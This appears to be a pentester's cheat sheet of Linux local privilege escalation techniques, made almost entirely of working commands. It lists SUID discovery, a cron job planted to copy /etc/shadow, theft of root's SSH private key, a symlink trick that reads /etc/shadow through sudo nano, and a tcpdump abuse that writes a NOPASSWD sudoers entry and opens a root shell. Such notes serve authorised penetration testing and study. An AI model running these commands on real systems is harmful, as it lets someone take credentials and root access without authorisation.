Local Privilege Escalation

SUID 
find / -perm -4000 2>/dev/null 
Exploitation depends on functionality of SUID. Reading files or writing files leads to grabbing SSH / shadow files. 
Cron
# Find bad privs
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;
​
# Look at when it will run and who as
cat /etc/crontab
​
# Get it to write to shadow file 
echo -e '#!/bin/bash\n/bin/cat /etc/shadow > /tmp/shadow' > /etc/cron.hourly/oddjob
Readable SSH 
# Check listing root
ls -la /root
​
# Check listing ssh
ls -la /root/.ssh 
​
# Read file (worth trying even if you cant list contents of .ssh
cat /root/.ssh/id_rsa
​
# Make SSH dir
mkdir /home/<user>/.ssh
​
# Copy SSH into it 
cp /root/.ssh/id_rsa /home/<user>/.ssh
​
# Change Perms 
chmod o-rwx /home/<user>/.ssh/id_rsa
​
# SSH
ssh -i /home/<user>/.ssh/id_rsa [email protected]
Symlink
# Check sudo rights 
sudo -l 
​
# If you have sudo rights for something like nano on a specific file
# Create symlink to link that file to shadow and then read it 
# File in example is readme.txt
​
 ln -s /etc/shadow readme.txt
 
 # Link to proper terminal
 export TERM=xterm
​
#Read file
sudo nano readme.txt
TCPDump
# If tcpdump is in sudo list then we can abuse
​
# Create a file /tmp/elevate
​
#!/bin/bash
echo “james ALL=(root) NOPASSWD: ALL” >> /etc/sudoers
​
chmod +x /tmp/elevate
 
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/elevate -Z root
​
sudo bash

Last modified 2yr ago